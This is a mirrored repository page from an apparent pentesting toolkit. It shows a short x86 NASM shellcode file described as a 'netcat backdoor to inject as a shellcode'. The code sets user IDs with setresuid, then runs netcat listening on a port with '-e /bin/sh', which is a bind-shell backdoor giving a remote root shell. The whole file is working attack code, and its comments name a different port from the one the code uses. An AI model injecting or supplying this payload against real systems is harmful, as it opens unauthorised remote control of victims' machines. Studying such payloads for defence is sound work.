mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-27 11:09:09 -04:00
30 lines
1.1 KiB
NASM
30 lines
1.1 KiB
NASM
;netcat backdoor to inject as a shellcode
|
|
jmp short todo
|
|
shellcode:
|
|
xor eax, eax ; Zero out eax
|
|
xor ebx, ebx ; Zero out ebx
|
|
xor ecx, ecx ; Zero out ecx
|
|
xor edx, edx ; Zero out edx using the sign bit from eax
|
|
mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4)
|
|
int 0x80 ; syscall execute
|
|
pop esi ; esi contain the string in db
|
|
xor eax, eax ; Zero out eax
|
|
mov[esi + 7], al ; null terminate /bin/nc
|
|
mov[esi + 16], al ; null terminate -lvp90
|
|
mov[esi + 26], al ; null terminate -e/bin/sh
|
|
mov[esi + 27], esi ; store address of /bin/nc in AAAA
|
|
lea ebx, [esi + 8] ; load address of -lvp90 into ebx
|
|
mov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebx
|
|
lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx
|
|
mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx
|
|
mov[esi + 39], eax ; Zero out DDDD
|
|
mov al, 11 ; 11 is execve syscakk number
|
|
mov ebx, esi ; store address of /bin/nc
|
|
lea ecx, [esi + 27] ; load address of ptr to argv[] array
|
|
lea edx, [esi + 39] ; envp[] NULL
|
|
int 0x80 ; syscall execute
|
|
todo:
|
|
call shellcode
|
|
db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'
|
|
; 0123456789012345678901234567890123456789012
|